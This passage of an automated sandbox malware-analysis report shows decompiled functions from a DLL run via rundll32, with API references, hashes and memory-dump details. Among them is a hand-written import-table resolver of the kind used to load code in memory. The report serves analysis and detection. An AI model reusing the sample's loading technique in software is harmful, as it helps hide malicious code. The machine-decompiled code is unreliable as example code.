Instruction Fuzzy Hash: CE4106F1A0025567CF24CAA8ED95BEE3BD5DF41254F200116FE02EE255E675CDF092D1

Uniqueness

Uniqueness Score: -1.00%

Function 100145EB Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E100145EB(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L10014744();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E100145C4(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E10009627(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x10012dd6
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x100145eb
0x100145ee
0x100145f3
0x100145f7
0x100145f7
0x100145fd
0x10014601
0x10014602
0x10014605
0x10014606
0x1001460b
0x1001460e
0x1001460f
0x10014614
0x1001461b
0x100146a4
0x100146a4
0x00000000
0x10014626
0x10014627
0x10014639
0x1001465f
0x1001465f
0x10014668
0x1001466a
0x10014670
0x1001469f
0x1001469f
0x100146a7
0x100146aa
0x100146aa
0x10014672
0x10014673
0x10014679
0x1001467b
0x1001467b
0x10014680
0x1001467f
0x1001467f
0x10014687
0x10014693
0x1001469d
0x1001469d
0x00000000
0x10014649
0x10014649
0x10014649
0x1001464f
0x00000000
0x00000000
0x10014651
0x10014657
0x1001465c
0x00000000
0x1001465c
0x10014639

APIs

_snprintf.MSVCRT ref: 1001460F
strchr.MSVCRT ref: 1001462F
strchr.MSVCRT ref: 1001463E
strchr.MSVCRT ref: 10014663

Strings

%.*g, xrefs: 10014606

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
Instruction ID: 4f38b1db0cc1ba9a95d8daf564856a08a1274e3eb1987c121476b3081b14d048
Opcode Fuzzy Hash: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
Instruction Fuzzy Hash: BD210576604A562BE725CE689C85F9B3788DF032A8F270125F8449E1A1EFB1EDC04392

Uniqueness

Uniqueness Score: -1.00%

Function 69372D40 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 69372D59
_unlock.MSVCRT ref: 69372D81
calloc.MSVCRT ref: 69372DCF

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
Instruction ID: e57ba15901c9424b43c566300453cded90fc4af5f3279247c11cd0579015c456
Opcode Fuzzy Hash: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
Instruction Fuzzy Hash: B811F9751043418BE760DF28C68075A7BE4FF45754F158669E8E8CF285EB38D842CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 1000B194 Relevance: 7.6, APIs: 5, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000B194(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				short _v532;
				WCHAR* _t17;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR** _t27;
				signed int _t28;
				signed int _t29;

				_v8 = _v8 & 0x00000000;
				_t21 = __ecx;
				_t29 = _t28 | 0xffffffff;
				_t27 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				if(_t27 != 0 && _v8 > 0) {
					_t24 =  *_t27;
					if( *_t24 == 0x5c || _t24[1] == 0x3a) {
						lstrcpynW(_t21, _t24, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v532);
						_push(0);
						_push( *_t27);
						_push("\\");
						_t17 = E10009DC8( &_v532);
						_v12 = _t17;
						lstrcpynW(_t21, _t17, 0x104);
						E1000953B( &_v12, 0xfffffffe);
					}
					_t29 = 0;
				}
				return _t29;
			}

0x1000b19d
0x1000b1a4
0x1000b1a6
0x1000b1ba
0x1000b1be
0x1000b1c6
0x1000b1cc
0x1000b222
0x1000b1d5
0x1000b1e2
0x1000b1e8
0x1000b1ea
0x1000b1f2
0x1000b1f8
0x1000b200
0x1000b206
0x1000b212
0x1000b218
0x1000b228
0x1000b228
0x1000b230

APIs

GetCommandLineW.KERNEL32(00000000,00000000,00000001), ref: 1000B1A9
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B1B4
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B1E2
lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B206

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B222

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLinelstrcpyn$ArgvCurrentDirectoryFreeHeap
String ID:
API String ID: 3637931765-0
Opcode ID: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
Instruction ID: 92cfb7d19344df0840c9c24c95e32cfe92fb274ad31b5fe10eba1c98c5779baa
Opcode Fuzzy Hash: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
Instruction Fuzzy Hash: D01182B1D00219BBEB11DBA4DC8DFAAB7FCEF063A9F204559E511A2190E7B099818790

Uniqueness

Uniqueness Score: -1.00%

Function 1001478C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001478C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E100097F9(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x1001478c
0x10014792
0x1001479a
0x100147af
0x100147c1
0x100147cd
0x100147d3
0x100147d8
0x100147e4
0x1001494f
0x00000000
0x1001494f
0x100147ea
0x100147f3
0x10014801
0x10014804
0x10014813
0x10014813
0x1001481a
0x10014828
0x1001482b
0x1001483b
0x10014848
0x1001484f
0x1001485f
0x10014871
0x10014877
0x10014861
0x10014869
0x10014869
0x1001487a
0x1001487e
0x1001488a
0x1001488e
0x10014892
0x10014896
0x100148a2
0x100148cd
0x100148d5
0x100148db
0x100148e7
0x100148f3
0x100148a4
0x100148a9
0x100148b4
0x100148c0
0x100148c0
0x100148fc
0x10014902
0x1001490c
0x10014928
0x1001490e
0x10014911
0x1001491d
0x1001491d
0x1001490c
0x10014930
0x10014939
0x10014939
0x10014947
0x00000000
0x10014947
0x10014853
0x00000000
0x10014853
0x00000000
0x1001482b
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100147A9
LoadLibraryA.KERNEL32(00000000), ref: 10014842

Strings

kernel32.dll, xrefs: 100147A4
GetProcAddress, xrefs: 100147B2

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
Instruction ID: 8b6fcfd140f2f906d51b79ea8514458062b2bcfb6dcd42a390860808ae8ece4b
Opcode Fuzzy Hash: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
Instruction Fuzzy Hash: E2619F75D00209EFDB00CF98C481BADBBF1FF08365F218599E815AB2A1DB34AA81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 69372280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 6937230D

Strings

@, xrefs: 69372358

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: QueryVirtual
String ID: @
API String ID: 1804819252-2766056989
Opcode ID: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
Instruction ID: 45dabc64c29d0d04d049ea0e05bff10a6739e34b8c88f5f4a194d3f13399f38f
Opcode Fuzzy Hash: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
Instruction Fuzzy Hash: 284181769043018FDB10DF68C68561AFBF4FF4A324F458A29D8A89B304E338E446CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6937233C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 6937230D
VirtualProtect.KERNEL32 ref: 69372367
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6938B524), ref: 69372374

Part of subcall function 69372EA8: fwrite.MSVCRT ref: 69372ED7
Part of subcall function 69372EA8: vfprintf.MSVCRT ref: 69372EF7
Part of subcall function 69372EA8: abort.MSVCRT ref: 69372EFC

Strings

@, xrefs: 69372358

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1616349570-2766056989
Opcode ID: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
Instruction ID: db348d529f06913b54d1c39fbc3be87fc87b17a083a0e57a2f9a1b5d3835264a
Opcode Fuzzy Hash: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
Instruction Fuzzy Hash: F5213AB68043418FDB10DF38D685619FBE0FF4A318F05CA29D8A89B254E338E506CF56

Uniqueness

Uniqueness Score: -1.00%

Function 10015390 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10015390(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8ac9b60f
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x20d88a1
					_t12 = _t272 + 0x5c; // 0x9fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E100183B0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10017110(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x9fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10017250( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x20d88a1
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x20d88a1
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x48af445
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x20d88a1
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x20d88a1
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x2c20206
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x9fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x48af445
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x20d88a1
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10017250(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x20d88a1
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8ac9b60f
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x9fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x9fe85000
							E100183B0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10017110( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x9fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10015396
0x1001539b
0x1001539f
0x100153a2
0x100153a2
0x100153a5
0x100153aa
0x100153af
0x100153b2
0x100153b7
0x100153ba
0x100153c0
0x100153c0
0x100153cb
0x100153ce
0x100153d5
0x100153da
